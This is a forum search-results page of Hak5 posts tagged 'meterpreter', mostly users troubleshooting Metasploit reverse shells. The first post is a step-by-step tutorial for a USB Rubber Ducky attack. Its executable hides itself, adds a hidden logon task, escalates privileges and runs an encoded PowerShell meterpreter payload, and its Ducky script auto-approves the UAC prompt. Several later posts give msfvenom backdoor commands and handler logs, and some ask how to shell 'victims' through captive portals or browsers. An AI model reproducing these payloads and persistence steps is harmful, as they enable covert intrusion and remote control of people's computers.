Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'meterpreter'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 19 results

  1. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!
  2. Hi, I use a pinapple nano, with the last firmware. I would like to know how to add a code into the Evil Portal module to obtain a meterpreter session when the "victim" tries to authentificate? Someone could help me? Best regards, Michael
  3. Hey there! I am Luuk a 14 year old boy who's very intrested in cyber security. When I was little [smaller] ;] I always dream about being a cool hacker. Like 1 year ago I decided to start so i made a usb with kali linux on it and i learned the basics from metasploit [meterpreter payloads] I also discovered how to hide virus for a lot of av like windows defender. I also learned the basic commands of the terminal and working with armitage. But I have 1 problem ;[ Every time when i want to start a listener i make the payload like this msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp.ngrok.io LPORT=the port of ngrok -f exe > payload.exe So thats done and i wanted to start a listener. I open metasploit and type: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 127.0.0.1 set lport 80 exploit Ok so a few month's ago it would say started reverse handler ........ And it started to listen Now it says started reverse handler and a new line is opened. What!!! What's going on When i search the job with services its listening but when i type run {job nummer} it says did you wanted a reversebindlistenadress Failed to bind 127.0.0.1 failed to bind 0.0.0.0 So thats my problem oh. Extra note: I use ngrok for meterpreter over wan {i can't port forward for some reason} It would be great if i can get a answer thanks and happy hacking!
  4. Hello! I would like to ask if there is any way to use meterpreter directly from the bash bunny metasploit over wan after i infected a machine. And also if S. E. T is working :) Thanks in advance :)
  5. Vengeance

    Meterpreter over WAN(need help)

    I have been trying to get a meterpreter session over WAN using a reverse tcp attack for a while now and i'm pretty stuck. My attack works fine on LAN and I have port forwarding set up to sent the session to my listener on port 4444. I can get a netcat session over WAN so i know the port forwarding is set up correctly but meterpreter doesn't seem to be receiving any connections. Any thoughts?
  6. blackcoat

    Meterpreter

    Fud backdoor with Pwnwinds with bat. format + Powershell is not connecting with metasploit listener.The backdoor was made by TheFatRat connection type :reverse https Attacked virtual box os type:windows 10
  7. Hello everyone, I am new here - this is very first post. I hope it's in the correct section! Anyway, the past week I have been wanting to port forward in order to be able to start an external session (get into meterpreter when the victim is not using my IP) However, it turns out that port forwarding isn't possible on IPV6 - in fact, it WOULD work if the victim uses IPV6 as well. I haven't confirmed that, anyway. ( please correct me if I am wrong here) My question is, is there any way to start a session as an IPV6 user, as in maybe an exploit that can do it? I usually use the multi/handler exploit, with the windows/meterpreter/reverse_tcp payload. (also tried reverse_ipv6_tcp) If someone can help me or respond to this thread I will highly appreciate it! Thank you!
  8. Hi guys, Anyone know how I can get shell access in using any modern browsers (Chrome, IE, Firefox, etc. so that the browser doesn't bitch at me and say I need to upgrade to latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 then using the exploit: exploit/windows/browser/ms10_002_aurora. But so far I got nothing. :( No meterpreter sessions. This is for a presentation, by the way. Any of you guys suggest a different way? I am desperate. Wait not really. Just really frustrated. Hope someone can help. Thanks in advance!
  9. I setup my host, my port, and then set my payload but after I type exploit into the terminal it starts the TCP handler and stays on msf exploit (handler) msf > use exploit/multi/handler msf exploit(handler) > set lport 4444 lport => 4444 msf exploit(handler) > set lhost 192.168.x.x lhost => 192.168.x.x msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > exploit -j [] Exploit running as background job 0. [] Started reverse TCP handler on 192.168.1.7:4444 msf exploit(handler) >
  10. bro i made a payload in metasploit by using ngrok without portforwarding so that i can go WAN...but in ngrok the port get changed everytime i open it...so ineed to make the payload again and again and send it to the victim...is there any way i can overcome this
  11. FrankMurphy31

    exploit/unix/x11/x11_keyboard_exec

    Im trying to exploit my rooted galaxy core prime which is vulnerable to the exploit/unix/x11/x11_keyboard_exec module. Im having a bit of trouble getting a shell. Ive got to the point where a session is created, but when i try to interact with the session to get a shelll it just stops and hangs and does nothing. Ive tried different payloads but the same thing happens everytime. It just says interacting with session <ID>, and I cant get any further than that. Any tips or help would be appreciated. And Im also a bit confused on configuring the reverse shell payload. is the LHOST supposed to be my IP or the victims in a reverse shell. plus what is the proper IP and port number for "ReverseListenerBindAddress" and "ReverseListenerBindPort? Thank you.
  12. hanshaze

    Meterpreter Module

    I dont get it.... Do I have to install meterpreter directly on the wifi pineapple or on another machine? #ssh Would be no problem, would have enen Raspberry Pi, on the Metasploit runs. But every time I enter on the API of the Pineapple Meterpreter Module the login data of my "Home Network-Raspberry Pi" nothing happens at all!
  13. Hi!! I get this error when I try to run the record_mic command y meterpreter session: Error running command record_mic: NoMethodError undefined method 'value' for nil: NilClass What I'm doing wrong? Thanks!!!
  14. hackRecorded

    meterpreter stuck on OSX metasploit

    I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  15. I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  16. james2238

    Meterpreter Keylogging

    Here's my problem, I get a meterpreter shell on a remote PC through psexec and migrate to the explorer process to start a keylogger. The problem is that I want to get keystrokes from a remote desktop session the user has open. I've tried migrating to the remote desktop process and starting the keylogger, but that didn't work either. Does anyone here have any ideas?
  17. hi! I'm trying to get into a Windows 10 64x computer in the same LAN than another 86x pc with Kali Linux. Once I finally get into the target pc (w10) and the meterpreter session is open, the meterpreter session command prompt doesn't appear, I mean, I don't get the meterpreter> command prompt... What I'm doing wrong? Thaks!!
  18. So I literally just finished copying this tutorial ... https://www.youtube.com/watch?v=fmRRX7-G4lc And everything went smoothly... Apart from when I plugged in the duck... Nothing happened on my Kali MSF... No shells were caught? I should first off mention that my target machine was actually a 64 bit windows, so i had to change the msfvenom -a to x64 and change the payload to windows/x64/meterpreter/reverse_tcp... But besides that everything went ok... So because the shell wasnt being caught, I decided to open up powershell my self, and manually type in the code that the ducky inject.bin is trying to run in powershell.... and i got this error... So I think the reason nothing happens when I plug the duck in, is because in the background (because obviously it is commanded to be hidden in the inject.bin) this is happening... making MSF not catch a shell... Please could anyone take a look at this and help me overcome this error please. I would be forever grateful! Thank you hak5 enthusiasts! <3
  19. Torkast

    About the LanTurtle

    Hello! After reading about the LanTurtle and watching the videos for it i have a few questions about the product before i purchase it. Lets make the example that i have successfully installed the LanTurtle on a targeted computer. I've got remote SSH connection to Turtle and a meterpreter session active. As i've understood correctly the lanturtle is the only equipment on the network i have access to and not even the computer it is attached to! So if i want to get access to computers on the network i could use the meterpreter session and launch attacks to the computers from the turtle and get a new meterpreter into the new computer and work from there? If there is a vulnerable computer on the network of course. Can the Turtle which is connected to the network also visit network folders/disks? Let's say there is a computer/Server sharing files and its accessible by anyone on the network. Can the Turtle access these network folders if they are open for the network the Turtle is connected to and transfer these files to the SSH server forexample? I'm pretty new to metasploit but still learning how it works and how it would work out with the LanTurtle the practical way. Also a great tool when i perform pentest for the local companies (FYI: legal and paid work, i don't plan to abuse this if someone were to ask ) i mostly do physical testing and assesment and this would be a really good tool for me as my other co-worker do the software/web part.
×